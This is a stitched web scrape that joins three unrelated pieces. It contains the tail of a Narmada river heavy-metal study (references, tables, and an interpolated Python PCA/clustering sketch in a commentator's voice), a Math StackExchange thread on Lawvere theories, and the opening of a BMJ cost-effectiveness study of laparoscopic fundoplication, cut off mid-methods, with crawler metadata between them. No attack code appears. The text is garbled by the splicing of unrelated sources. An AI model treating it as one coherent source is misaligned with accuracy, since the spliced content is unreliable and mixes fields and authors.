CK, Sharma MK. Heavy metal transport in the Hindon river basin, India. Environ Monit Assess. 2006;112:255–270. 46. Reza R, Singh G. Heavy metal contamination and its indexing approach for river water. Intern J Environ Sci Technol. 2010;7:785–792. 47. Nayak BB, Panda UC, Panigrahy PK, Acharya BC. Dynamics of heavy metals in Dhamara Estuary of Orissa state in India. Chem Environ Res. 2001;10:203–218. 48. Mishra S, Kumar A, Yadav S, Singhal MK. Assessment of heavy metal contamination in water of Kali River using principle component and cluster analysis, India. Sustain Water Resour Manag. 2018;4:573–581. 49. EPA. US EPA Office of Water. Office of science and technology (EPA-822-R-00-001) [online]. Environmental Protection Agency Region I; Washington, DC 20460: 2004. [cited 18 December 2018]. Available from: www.epe.gov/safewater 50. US EPA. Exposure Factor Handbook (EPA/600/p-95/002Fa) (Update to Expo-sure Factors Handbook EPA/600/8-89/043). Washington, DC: Environmental Protection Agency Region I; 1977. ##### Fig. 1 Assessment of water quality in river Narmada: (a) Schematic diagram of the research methodology; (b) Sampling locations in river Narmada in state Madhya Pradesh, India; (c) Box and whiskers plot of variation and spatial distribution of heavy metals; (d) Pie plot representing abundance of heavy metals in the river. ##### Fig. 2 Water quality status: (a) CPI based water quality status in river Narmada; (b) Trend analysis of heavy metal contamination in river Narmada; (c) Variations of NSFWQI and CPI at the sampling locations in river Narmada. ##### Fig. 3 HCA and PCA of heavy metal dataset: (a) Dendrogram of heavy metal contamination at sampling location using Ward method; (b) Scree plot of components; (c) Component loadings and score plot of heavy metals. 
##### Table 1
Evaluation of Water Quality Indices and Risk Assessment Index at Sampling Location in River Narmada

| Sampling location | NSFWQI value | NSFWQI status | CPI value | CPI status | HPI value | HPI status | RAI value | RAI status |
|---|---|---|---|---|---|---|---|---|
| R1 | 65 | Medium | 7.52 | Severely | 4.98 | Severely | 6.90 | Unacceptable |
| R2 | 69 | Medium | 2.69 | Severely | 5.48 | Severely | 7.31 | Unacceptable |
| R3 | 65 | Medium | 2.87 | Severely | 5.28 | Severely | 7.97 | Unacceptable |
| R4 | 65 | Medium | 2.81 | Severely | 3.71 | Severely | 5.25 | Unacceptable |
| R5 | 72 | Good | 1.51 | Moderately | 1.08 | Contaminated | 1.95 | Unacceptable |
| R6 | 67 | Medium | 2.17 | Severely | 1.27 | Contaminated | 2.25 | Unacceptable |
| R7 | 68 | Medium | 0.97 | Slightly | 1.10 | Contaminated | 2.00 | Unacceptable |
| R8 | 69 | Medium | 2.01 | Severely | 0.94 | Slightly | 1.82 | Unacceptable |
| R9 | 74 | Good | 1.01 | Moderately | 0.71 | Slightly | 1.57 | Unacceptable |
| R10 | 74 | Good | 1.76 | Moderately | 1.05 | Contaminated | 1.87 | Unacceptable |
| R11 | 70 | Good | 1.37 | Moderately | 0.69 | Slightly | 1.73 | Unacceptable |
| R12 | 71 | Good | 1.81 | Moderately | 0.28 | Slightly | 6.18 | Unacceptable |
| R13 | 69 | Medium | 2.66 | Severely | 0.30 | Slightly | 4.62 | Unacceptable |
| R14 | 71 | Good | 2.55 | Severely | 0.25 | Slightly | 4.40 | Unacceptable |
| R15 | 76 | Good | 1.88 | Moderately | 0.27 | Slightly | 4.05 | Unacceptable |
| R16 | 64 | Medium | 1.71 | Moderately | 0.27 | Slightly | 3.26 | Unacceptable |
| R17 | 69 | Medium | 1.86 | Moderately | 0.25 | Slightly | 3.20 | Unacceptable |
| R18 | 74 | Good | 1.41 | Moderately | 0.13 | Slightly | 2.27 | Unacceptable |
| R19 | 77 | Good | 0.76 | Slightly | 0.20 | Slightly | 2.24 | Unacceptable |
| R20 | 80 | Good | 0.68 | Slightly | 0.18 | Slightly | 2.14 | Unacceptable |
| R21 | 73 | Good | 1.50 | Moderately | 0.30 | Slightly | 2.65 | Unacceptable |
| R22 | 72 | Good | 0.89 | Slightly | 0.21 | Slightly | 2.56 | Unacceptable |
| R23 | 64 | Medium | 1.22 | Moderately | 2.02 | Moderately | 10.82 | Unacceptable |

##### Table 2
Evaluation of Cancer Risk Value at Sampling Location in River Narmada (cancer risk values expressed as 1×10−6)

| Sampling location | Cr | As | Pb | Average | Cancer risk status |
|---|---|---|---|---|---|
| R1 | 317.44 | 2333.14 | 1943.07 | 1531.22 | High |
| R2 | 400.29 | 2090.83 | 2307.01 | 1599.37 | High |
| R3 | 790.48 | 3938.45 | 2144.09 | 2291.01 | High |
| R4 | 335.26 | 2365.21 | 1544.88 | 1415.12 | High |
| R5 | 594.49 | 2058.76 | 300.69 | 984.65 | High |
| R6 | 302.59 | 2238.71 | 464.99 | 1002.09 | High |
| R7 | 103.64 | 2195.95 | 380.15 | 893.24 | High |
| R8 | 603.40 | 1995.51 | 306.74 | 968.55 | High |
| R9 | 163.03 | 2423.11 | 191.07 | 925.74 | High |
| R10 | 333.48 | 1752.30 | 383.29 | 823.02 | High |
| R11 | 408.01 | 2432.02 | 206.62 | 1015.55 | High |
| R12 | 21736.75 | 15821.50 | 11.91 | 12523.39 | High |
| R13 | 21787.23 | 10512.04 | 8.48 | 10769.25 | High |
| R14 | 21427.92 | 10182.42 | 4.24 | 10538.19 | High |
| R15 | 20195.58 | 9175.76 | 5.20 | 9792.18 | High |
| R16 | 15064.28 | 7714.76 | 3.89 | 7594.31 | High |
| R17 | 13831.94 | 7509.87 | 2.68 | 7114.83 | High |
| R18 | 10488.28 | 4908.59 | 3.53 | 5133.47 | High |
| R19 | 11108.91 | 4890.77 | 3.38 | 5334.35 | High |
| R20 | 9710.27 | 4970.95 | 4.04 | 4895.08 | High |
| R21 | 9365.81 | 6877.37 | 2.47 | 5415.22 | High |
| R22 | 9529.13 | 6619.02 | 3.94 | 5384.03 | High |
| R23 | 10360.59 | 8195.82 | 0.81 | 6185.74 | High |

##### Table 3
Pearson Correlation Coefficients of Heavy Metals

| Heavy metals | Cr | Mn | Fe | Cu | Zn | As | Cd | Pb | Co | Ni |
|---|---|---|---|---|---|---|---|---|---|---|
| Cr | 1.000 | | | | | | | | | |
| Mn | 0.064 | 1.000 | | | | | | | | |
| Fe | 0.873 | 0.400 | 1.000 | | | | | | | |
| Cu | −0.584 | −0.134 | −0.590 | 1.000 | | | | | | |
| Zn | −0.538 | −0.128 | −0.544 | 0.986 | 1.000 | | | | | |
| As | 0.932 | 0.163 | 0.850 | −0.492 | −0.449 | 1.000 | | | | |
| Cd | 0.225 | −0.122 | 0.047 | 0.314 | 0.335 | 0.462 | 1.000 | | | |
| Pb | −0.554 | −0.124 | −0.555 | 0.998 | 0.981 | −0.463 | 0.323 | 1.000 | | |
| Co | −0.710 | −0.157 | −0.736 | 0.870 | 0.842 | −0.591 | 0.345 | 0.853 | 1.000 | |
| Ni | 0.914 | 0.198 | 0.955 | −0.642 | −0.593 | 0.868 | 0.071 | −0.608 | −0.781 | 1.000 |

##### Table 4
PCA Components Values and Communalities of Heavy Metals

| Elements | Component 1 | Component 2 | Component 3 | Communalities |
|---|---|---|---|---|
| Initial Eigen values | 6.150 | 2.028 | 1.071 | |
| Variance % | 61.498 | 20.281 | 10.712 | |
| Cumulative % | 61.498 | 81.779 | 92.490 | |
| Co | −0.920 | 0.237 | 0.029 | 0.903 |
| Ni | 0.908 | 0.303 | 0.040 | 0.918 |
| Cu | −0.887 | 0.393 | 0.124 | 0.956 |
| Fe | 0.879 | 0.317 | 0.257 | 0.940 |
| Pb | −0.865 | 0.418 | 0.134 | 0.941 |
| Cr | 0.862 | 0.421 | −0.122 | 0.936 |
| Zn | −0.854 | 0.432 | 0.127 | 0.932 |
| As | 0.795 | 0.587 | −0.049 | 0.978 |
| Cd | −0.101 | 0.862 | −0.216 | 0.800 |
| Mn | 0.235 | 0.007 | 0.943 | 0.944 |

##### Table 5
Comparative Analysis of Average Heavy Metal Concentration Dissolved in the Indian Rivers

| S. No | Rivers name | Location | Mn (μg/L) | Cu (μg/L) | Co (μg/L) | Fe (μg/L) | Ni (μg/L) | Zn (μg/L) | Pb (μg/L) | Cr (μg/L) | Cd (μg/L) | As (μg/L) | Reference |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | Ganga | Western Uttar Pradesh | NR | 1910 | NR | 2810 | NR | 2500 | NR | 550 | NR | NR | [28] |
| 2 | Sabarmati | Gujarat | NR | 386 | NR | NR | 289 | 103 | NR | 309 | NR | NR | [38] |
| 3 | Subarnarekha | West Bengal | 7.04 | 4.84 | 0.27 | 83.60 | 3.03 | NR | NR | 0.80 | NR | NR | [39] |
| 4 | Mahanadi | State of Orissa | 17.51 | 9.86 | 5.81 | 113.50 | 13.12 | 23.21 | 7.31 | 5.13 | 1.23 | NR | [40] |
| 5 | Achankovil | Kerala | 699 | 224 | NR | 11858 | NR | 415 | 72 | NR | 6 | NR | [41] |
| 6 | Damodar | West Bengal | NR | 3950 | NR | 480 | NR | NR | NR | 11550 | 300 | NR | [42] |
| 7 | Gomti | Uttar Pradesh | 97 | 1.30 | NR | 220 | 9 | 28.5 | 26 | 4 | 0.40 | NR | [43] |
| 8 | Koel-Brahmani | West Bengal | 303.30 | 6.67 | 8.67 | 481 | 24.78 | 31.56 | 1.67 | 10.89 | NR | NR | [44] |
| 9 | Hindon | Western Uttar Pradesh | 129 | 6.6 | NR | 226 | 24 | 58 | 37 | 15 | NR | NR | [45] |
| 10 | Brahmani river | State of Orissa | 102 | 4.70 | 5.6 | 95 | 52 | 80.10 | 27 | NA | 4 | NR | [46] |
| 11 | Baitarani | State of Orissa | 1.70 | 3.45 | 0.70 | 100.5 | 3.90 | 272.30 | 3.45 | 9.60 | NR | NR | [47] |
| 12 | Kali (East) | Western Uttar Pradesh | NR | NR | NR | 1530 | NR | 24710 | 130 | 60 | 60 | NR | [48] |
| 13 | Narmada | Madhya Pradesh | 13.68 | 80.80 | 0.05 | 55.95 | 1.68 | 22.77 | 8.81 | 2.62 | 0.06 | 0.6 | In this study |
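Tables 3 and 4 (and Fig. 3) are standard chemometric summaries: a Pearson correlation matrix, principal component loadings with eigenvalues and communalities, and Ward-linkage clustering of the sampling sites. As a rough template for producing this kind of output, here is a minimal Python sketch; the input data frame is synthetic, the loadings are unrotated, and nothing below reproduces the study's actual numbers or workflow.

```python
# Illustrative only: synthetic data standing in for measured metal
# concentrations at sampling sites R1..R23.
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from scipy.cluster.hierarchy import linkage

metals = ["Cr", "Mn", "Fe", "Cu", "Zn", "As", "Cd", "Pb", "Co", "Ni"]
rng = np.random.default_rng(0)
data = pd.DataFrame(rng.lognormal(size=(23, len(metals))),
                    index=[f"R{i}" for i in range(1, 24)], columns=metals)

# Table 3 analogue: Pearson correlation matrix between metals.
corr = data.corr(method="pearson")

# Table 4 / Fig. 3(b)-(c) analogue: PCA on standardised concentrations.
z = StandardScaler().fit_transform(data)
pca = PCA(n_components=3).fit(z)
eigenvalues = pca.explained_variance_                # "Initial Eigen values" row
variance_pct = pca.explained_variance_ratio_ * 100   # "Variance %" row
loadings = pca.components_.T * np.sqrt(pca.explained_variance_)
communalities = (loadings ** 2).sum(axis=1)          # share of each metal captured by the 3 PCs

# Fig. 3(a) analogue: Ward-linkage hierarchical clustering of the sites.
ward_tree = linkage(z, method="ward")

print(corr.round(3))
print(pd.DataFrame(loadings, index=metals, columns=["PC1", "PC2", "PC3"]).round(3))
```

The published Table 4 values would additionally reflect whatever rotation and software defaults the authors used, so this should be read as a template rather than a reproduction.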
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 9, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5629773736000061, "perplexity": 9432.914484454774}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711017.45/warc/CC-MAIN-20221205132617-20221205162617-00016.warc.gz"}
http://math.stackexchange.com/questions/585868/lawvere-theories-an-equivalence
# Lawvere theories: an equivalence.

I'm having trouble understanding Lawvere theories (as defined below).

Definition: A Lawvere Theory is a category $\mathcal{L}$ with finite products and with a distinguished object $A$ such that every object of $\mathcal{L}$ is (isomorphic to) a finite power of $A$; that is, for any $X\in\operatorname{Ob}(\mathcal{L})$, there is an $n\in\mathbb{N}$ with $X\cong A^{n}$. The object $A$ is called the fundamental object of $\mathcal{L}$. An arrow $\omega :A^{n}\to A$ is called an $n$-ary operation (and, in particular, arrows of the type $A^{0}=1\to A$ are called constants).

Here's an exercise in Turi's Category Theory Lecture Notes:

Let $\mathbb{N}^{\text{op}}$ be the opposite category of natural numbers and all functions. Show that Lawvere theories are equivalent to product preserving functors $$\mathbb{N}^{\text{op}}\to\mathbf{C}$$ that are bijective on objects.

The problem: I'm not sure what to do. The $\mathbf{C}$ doesn't help as it's undefined.

My attempt: Let $\mathcal{L}:\mathbb{N}^{\text{op}}\to\mathbf{C}$ be a product preserving functor bijective on objects. Then for any family $(n_{i})_{i\in I}$ of natural numbers indexed by a set $I$, if $\prod_{i\in I}{n_{i}}$ exists, then $\mathcal{L}\left(\prod_{i\in I}{n_{i}}\right) = \prod_{i\in I}{\mathcal{L}(n_{i})}$, and for all $m, n\in\mathbb{N}$, $c\in Ob(\mathbf{C})$,

• $\mathcal{L}(n)=\mathcal{L}(m)\Rightarrow n=m$
• there exists $m_{c}\in\mathbb{N}$ with $\mathcal{L}(m_{c})=c$.

I then set up the commutative diagram(s) for the product with an arbitrary $(f_{i})_{I}$ such that $f_{i}: k\to n_{i}$ in $\mathbb{N}^{\text{op}}$ and took $\mathcal{L}$ of everything. Then I got stuck. I want to force this $\mathcal{L}$ to be a Lawvere theory. Once I've done that, I'll take a Lawvere theory and try to go in the other direction. Thank you :)

Second attempt (based on the comments): The trick is to consider what happens to $1\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$. Note that the product in $\mathbb{N}^{\text{op}}$ is the coproduct in $\mathbb{N}$, so is simply addition. Suppose $L:\mathbb{N}^{\text{op}}\to\mathbf{C}$ is a product preserving functor bijective on objects. Then for all $c\in Ob(\mathbf{C})$, there exists a unique $m_{c}\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$ with $L(m_{c})=c$, and for any $m, n\in\mathbb{N}$, $L(m)=L(n)\Rightarrow m=n$. Let $L(1)=A$ and note that if a product $\sum_{i\in I}{a_{i}}$ exists in $\mathbb{N}^{\text{op}}$ for $a_{i}\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$, it is in $\mathbb{N}$ and so $I$ would be a finite set. Hence finite products must exist in $\mathbf{C}$. Now for $X\in\mathbf{C}$, $X=L(m_{X})$ for some $m_{X}\in\mathbb{N}$, so $X=L(m_{X})=L(\sum_{j=1}^{m_{X}}{1})=\prod_{j=1}^{m_{X}}{L(1)}=A^{m_{X}}$. Thus $X\cong A^{m_{X}}$. Therefore, the pair $\langle L, \mathbf{C}\rangle$ is a Lawvere theory.

Ideas for the converse: Let $L:\mathbb{N}^{\text{op}}\to\mathcal{L}$ such that $L(1)=A$ and . . .

• $L(u)=U\cong V=L(v)$ iff $L(u)=L(v),$
• $Y\cong A^{m}=L(m_{A^{m}})$ implies $L(m_{A^{m}})=Y$, or
• $L(m)=Y$ if (and only if) $Y\cong A^{m}$.

I've explored these ideas and they don't seem fruitful. I would like an explicit proof now please, $\color{red}{\large\text{not just hints}}$. This is really bugging me.

- The category $\mathcal{C}$ is a Lawvere theory, if you have a bijective-on-objects product-preserving functor $\mathbb{N}^\mathrm{op} \to \mathcal{C}$. –  Zhen Lin Nov 29 '13 at 17:29
@Zhen Lin: Thank you.
Given the definition above, though, I'm afraid that's little more than an assertion to me at the moment; I want to be able to show it :/ –  Alice Nov 29 '13 at 17:34
It says nothing of the sort. It says "equivalent". More precisely, there is an equivalence between the category of Lawvere theories and the category of bijective-on-objects product-preserving functors with domain $\mathbb{N}^\mathrm{op}$, if you choose the appropriate notion of morphism on both sides. –  Zhen Lin Nov 29 '13 at 17:52
Yes, you can do that. –  Zhen Lin Nov 29 '13 at 17:57
The product in $\mathbb{N}^\mathrm{op}$ is the coproduct in $\mathbb{N}$, which is addition. –  Zhen Lin Dec 1 '13 at 22:41

Let $\mathbf C$ be a Lawvere theory: i.e. a category with finite products such that there's an object $A \in \mathbf C$ for which for every other $X \in \mathbf C$ there's an $n \in \mathbb N$ such that $A^n\cong X$.

Let's consider $\mathbb N$, the category of natural numbers and all functions between them. Clearly we have a function between the objects of $\mathbb N$ and the objects of $\mathbf C$ defined as $$\mathcal L\colon \mathbb N \to \mathbf C,$$ with $\mathcal L(n) = A^n$ for $n \in \mathbb N \setminus\{0\}$ and $\mathcal L(0)=\bullet$ the terminal object of $\mathbf C$.

Let $f \colon n \to m$ be a morphism in $\mathbb N$, or else a function between the sets $\{0,\dots,n-1\}$ and $\{0,\dots,m-1\}$. For every $i \in \{0,\dots,m-1\}$ we can consider the family of morphisms $\langle \pi_i^j\rangle_{j=1,\dots,n}$ where $\pi^i_j=1_A$ if $i \in f^{-1}(\{j\})$, otherwise $\pi^i_j \colon A \to \bullet$ is the unique map into the terminal object $\bullet \in \mathbf C$. These morphisms give us a morphism $$\pi^i \colon A \to A^{f^{-1}(\{i\})}$$ by the universal property of products, and then we get the product morphism $$\mathcal L(f) = \prod_{i=1}^n \pi^i \colon A^n=\mathcal L(n) \to A^m=\mathcal L(m).$$

Clearly if $f=1_n$ for some $n$, then for every $i \in n$ we have $1_n^{-1}(\{i\})=\{i\}$ and so $\pi^i=1_A$ for every $i$, hence $\mathcal L(1_n)=1_{A^n}$. Doing the calculations you can prove also that $\mathcal L(g \circ f)=\mathcal L(f) \circ \mathcal L(g)$, for every pair $f \colon n \to m$ and $g \colon m \to k$; of course the calculations are a little complicated (I would rather not write them here).

This functor is clearly product preserving: indeed, for every $n \in \mathbb N$ we have that $\mathcal L(n)=A^n$, which is the $n$-fold product, and for every projection of $\mathbb N^\text{op}$, i.e. a map $p \colon 1 \to n$ in $\mathbb N$, we have that $$\mathcal L(p) = \prod_{i=1}^n \pi^i \colon A^n \to A,$$ where $\pi^i \colon A \to \bullet$ for $i \not \in \text{Im }p(0)$ and $\pi^i = 1_A$ for $i \in \text{Im }p(0)$. So $\mathcal L(p)$ is the $p(0)$-th projection of the product $A^n$; of course one should now verify that these data satisfy the universal property, which again involves some long calculations.

Forgive the lack of some details, but I think that adding them wouldn't make the answer more clear. Hope this helps. -

Thank you so much for your patience in writing that out for me, @Giorgio Mossa! I'm confident that I can take it from here. [I first need to check the existence of $\bullet$.] I hope you understand if I accept once I've got the damn thing! –  Alice Dec 4 '13 at 11:58
@Shaun sure of course. Btw $\bullet$ the terminal object is also the empty product, so it must exist in every category with finite products. :) –  Giorgio Mossa Dec 4 '13 at 12:08
Again, thank you.
I'm not sure I understand how $\mathcal{L}$ is bijective on objects though. What if there exists an $X$ such that $A^{n}\neq X\cong A^{n}$? [The same question, I suppose, covers how we can overlook $A^{n}\times\bullet\cong A^{n}$.] –  Alice Dec 4 '13 at 19:23 Oh, I see; it's a bit of a misnomer. –  Alice Dec 4 '13 at 19:30 [I'm following Turi's lecture notes. Maybe the term was covered in additional exercises or some other supplement.] –  Alice Dec 4 '13 at 19:44
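For a concrete picture of the correspondence (a sketch only, under the simplifying assumption that $\mathbf C$ is the full subcategory of $\mathbf{Set}$ spanned by the cartesian powers of a fixed set $A$ with at least two elements): put $L(n)=A^{n}$, and send a function $f\colon\{1,\dots,n\}\to\{1,\dots,m\}$, read as an arrow $m\to n$ of $\mathbb{N}^{\text{op}}$, to the reindexing map
$$L(f)\colon A^{m}\to A^{n},\qquad (a_{1},\dots,a_{m})\mapsto\bigl(a_{f(1)},\dots,a_{f(n)}\bigr),$$
that is, $L(f)=\langle\pi_{f(1)},\dots,\pi_{f(n)}\rangle$. This $L$ is product preserving (a product in $\mathbb{N}^{\text{op}}$ is a sum in $\mathbb{N}$, and $L(n)=A^{n}$ is the $n$-fold product of $L(1)=A$) and bijective on objects, and the arrows $A^{n}\to A$ of $\mathbf C$ are exactly the $n$-ary operations of the associated Lawvere theory.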
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9796623587608337, "perplexity": 171.05873444257853}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440644063881.16/warc/CC-MAIN-20150827025423-00244-ip-10-171-96-226.ec2.internal.warc.gz"}
https://www.bmj.com/content/339/bmj.b2576
Intended for healthcare professionals Research # Laparoscopic fundoplication compared with medical management for gastro-oesophageal reflux disease: cost effectiveness study BMJ 2009; 339 (Published 14 July 2009) Cite this as: BMJ 2009;339:b2576 1. David Epstein, honorary visiting fellow, doctoral student12, 2. Laura Bojke, research fellow1, 3. Mark J Sculpher, professor of health economics1, 4. The REFLUX trial group 1. 1Centre for Health Economics, University of York, Heslington, York YO1 5DD 2. 2Faculty of Economics and Business Sciences, Campus Universitario de la Cartuja, 18071 Granada, Spain 1. Correspondence to: L Bojke [email protected] • Accepted 19 March 2009 ## Abstract Objective To describe the long term costs, health benefits, and cost effectiveness of laparoscopic surgery compared with those of continued medical management for patients with gastro-oesophageal reflux disease (GORD). Design We estimated resource use and costs for the first year on the basis of data from the REFLUX trial. A Markov model was used to extrapolate cost and health benefit over a lifetime using data collected in the REFLUX trial and other sources. Participants The model compared laparoscopic surgery and continued proton pump inhibitors in male patients aged 45 and stable on GORD medication. Intervention Laparoscopic surgery versus continued medical management. Main outcome measures We estimated quality adjusted life years and GORD related costs to the health service over a lifetime. Sensitivity analyses considered other plausible scenarios, in particular size and duration of treatment effect and the GORD symptoms of patients in whom surgery is unsuccessful. Main results The base case model indicated that surgery is likely to be considered cost effective on average with an incremental cost effectiveness ratio of £2648 (€3110; US$4385) per quality adjusted life year and that the probability that surgery is cost effective is 0.94 at a threshold incremental cost effectiveness ratio of £20 000. The results were sensitive to some assumptions within the extrapolation modelling. Conclusion Surgery seems to be more cost effective on average than medical management in many of the scenarios examined in this study. Surgery might not be cost effective if the treatment effect does not persist over the long term, if patients who return to medical management have poor health related quality of life, or if proton pump inhibitors were cheaper. Further follow-up of patients from the REFLUX trial may be valuable. Trial registration ISRCTN15517081. ## Introduction Around 25% of adults in Western society experience intermittent heartburn, one of the cardinal symptoms of gastro-oesophageal reflux disease (GORD).1 2 Once diagnosed with erosive (persistent) GORD, patients often require lifelong pharmacotherapy, usually proton pump inhibitors.3 Although considered effective, there are concerns about the long term side effects of proton pump inhibitors, and expenditure on these drugs remains considerable, despite recent reductions in prices. In general practice in England expenditure was £233m (€274m; US$386m) in 2007.4 Laparoscopic fundoplication is now an alternative way to treat GORD. In addition to potential clinical benefits laparoscopic surgery should lead to the avoidance of continual medication and its associated costs. 
Several studies have examined economic characteristics of laparoscopic surgery.5 6 7 8 Of those that compared surgery with GORD medication, Bojke8 found that surgery was cost effective, and Cookson6 concluded that laparoscopic surgery had similar costs to medical management after eight years and was cost saving thereafter. Arguedas evaluated the strategies in a United States setting and concluded that medical therapy dominated surgery using a 10 year time horizon, assuming a higher rate of symptom recurrence and re-operation after surgery than in the surgery groups in the UK based studies.5 None of these studies, however, used estimates of health related quality of life derived from a randomised clinical trial comparing laparoscopic fundoplication with medical management, which is of central importance to the evaluation of these treatments. This paper updates the economic study by Bojke8 to incorporate one year health related quality of life data from the REFLUX trial.9 The multicentre REFLUX trial compared a strategy of laparoscopic surgery with one of continued medical management for patients with reasonable symptom control on GORD medications.9 The clinical and patient assessed outcomes of the trial up to one year after surgery have recently been reported. Although these findings showed clear benefits of surgery at this time in terms of health related quality of life, decision makers are also interested in the costs and cost effectiveness of the two forms of management. GORD is usually a chronic condition and a key issue is the extent to which benefits are sustained. Surgery is costly in the short term, but these costs may be at least partly offset by reductions in lifetime use of GORD medication. Extrapolation of health benefits and costs are thus needed to provide a meaningful estimate of cost effectiveness. ## Methods ### Overview We used a model comparing laparoscopic surgery and continued use of proton pump inhibitors in male patients aged 45 (the median age and predominant sex in the REFLUX trial9), and stable on anti-GORD medication. Over a lifetime horizon, health benefits were quantified in terms of quality adjusted life years and costs were assessed from the perspective of the United Kingdom’s NHS in 2008/2009 prices. Future costs and health benefits are discounted (adjusted to current values) at 3.5% per year, in accord with UK guidelines for economic evaluation.10 ### Model structure Figure 1 shows the model structure. It is a discrete time Markov cohort model with a cycle length of one year. Patients follow a strategy of either early laparoscopic surgery or continuation of medical management (without the option of surgery after failure of medical management). Fig 1 Model structure In the model, surgery may “fail” in one of two ways. Patients may need revision of surgery, either to improve symptom control or because of surgical complications, or they may return to use of long term medical management because of continued symptoms.11 This model assumes that patients in the medical management arm are stable on GORD medication. This assumption follows the inclusion criteria for the REFLUX trial. As a result “treatment failure” is not defined as a health state in the model. Annual costs of medical management are estimated using mean consumption of proton pump inhibitors during the REFLUX trial, incorporating any changes to dose or medication, and it is assumed that the estimate of health related quality of life includes, on average, remission or any side effects of medication. 
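To make the cohort arithmetic behind this structure concrete, the sketch below implements a stripped-down discrete time Markov calculation in Python. It is purely illustrative: it is not the authors' Excel model, it omits the revision-of-surgery state, and every input (probabilities, utilities, costs, horizon) is a placeholder rather than a REFLUX estimate.

```python
# Illustrative Markov cohort extrapolation (annual cycles) for surgery vs
# continued medical management; all inputs below are placeholders.
import numpy as np

YEARS, DISCOUNT = 35, 0.035
disc = 1.0 / (1.0 + DISCOUNT) ** np.arange(YEARS)   # discount factor per cycle

p_return_to_meds = 0.049     # annual probability surgery "fails" back to PPIs (placeholder)
p_death          = 0.01      # other-cause mortality (age/sex specific in practice)
u_surgery_ok, u_meds = 0.80, 0.73                   # utilities (placeholders)
c_meds_per_year, c_surgery_upfront = 250.0, 2100.0  # GBP (placeholders)

def surgery_arm():
    alive_ok, alive_meds = 1.0, 0.0                 # cohort fractions by state
    qalys, costs = 0.0, c_surgery_upfront
    for t in range(YEARS):
        qalys += disc[t] * (alive_ok * u_surgery_ok + alive_meds * u_meds)
        costs += disc[t] * alive_meds * c_meds_per_year
        moved = alive_ok * p_return_to_meds         # failures return to medication
        alive_ok   = (alive_ok - moved) * (1 - p_death)
        alive_meds = (alive_meds + moved) * (1 - p_death)
    return costs, qalys

def medical_arm():
    alive, qalys, costs = 1.0, 0.0, 0.0
    for t in range(YEARS):
        qalys += disc[t] * alive * u_meds
        costs += disc[t] * alive * c_meds_per_year
        alive *= (1 - p_death)
    return costs, qalys

c_s, q_s = surgery_arm()
c_m, q_m = medical_arm()
icer = (c_s - c_m) / (q_s - q_m)   # incremental cost per QALY gained
print(f"ICER ~ GBP {icer:,.0f} per QALY")
```

A probabilistic sensitivity analysis of the kind described under Analysis would repeat this calculation many times with the inputs drawn from probability distributions instead of fixed values.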
The base case assumes that, if surgical patients do not need to return to medical management or need revision of surgery, the relative difference in health related quality of life of surgery over medical management will be maintained over their lifetime. We used sensitivity analyses to consider other scenarios where the treatment effect (the difference in health related quality of life between medical management and those who do not fail surgery) only lasts for one, two, or five years. In these alternative scenarios, health related quality of life is the same in the surgery group as in the medical management group after the “treatment effect” ends, even in patients who do not return to the use of proton pump inhibitors. ### Evidence used in the model Costs for the first year in the model were estimated from the REFLUX trial.9 The trial collected data on use of health service resources up to one year, including inpatient days in hospital wards and high dependency units, diagnostic tests, duration in theatre, outpatient and general practitioner visits, re-admissions, and use of GORD medication. These resources were costed using routine NHS unit costs and prices (table 1). Table 1 Health related quality of life (HRQOL) estimates and rates of events used in model View this table: We calculated rates of return to medical management and revision of surgery using data from the REFLUX trial and studies identified through a literature search.8 12 The average rate of return to medical management overall was 4.9 per 100 person years and the average rate of revision of surgery was 0.8 per 100 person years, although rates seemed to vary considerably between studies. As we did not find evidence that this variation was related to length of follow-up, we assumed that the annual rate of surgical failure was constant over time. Details of the literature searches and meta-analyses are available in the Health Technology Assessment monograph.12 Sensitivity analyses were undertaken assuming higher and lower rates of failure. After the first year, all patients require an annual visit to their general practitioner. It was assumed that patients who fail surgery need an additional visit to their general practitioner and to a hospital specialist. No hospital admissions or outpatient visits for GORD related reasons were included after one year for patients with successful surgery.13 Patients can die of other causes,14 and the model assumed the same age and sex specific risk of mortality as the UK general population. Although no deaths from surgery or revision occurred in the REFLUX trial, a small additional risk of operative mortality was assumed, estimated by a meta-analysis (four deaths in 4000 procedures).8 ### Estimating quality adjusted life years The REFLUX trial measured health status using the generic EuroQol EQ-5D instrument.15 Each of the possible 243 health states was mapped to a preference based value (or “utility”) where zero represents a state equivalent to death and one 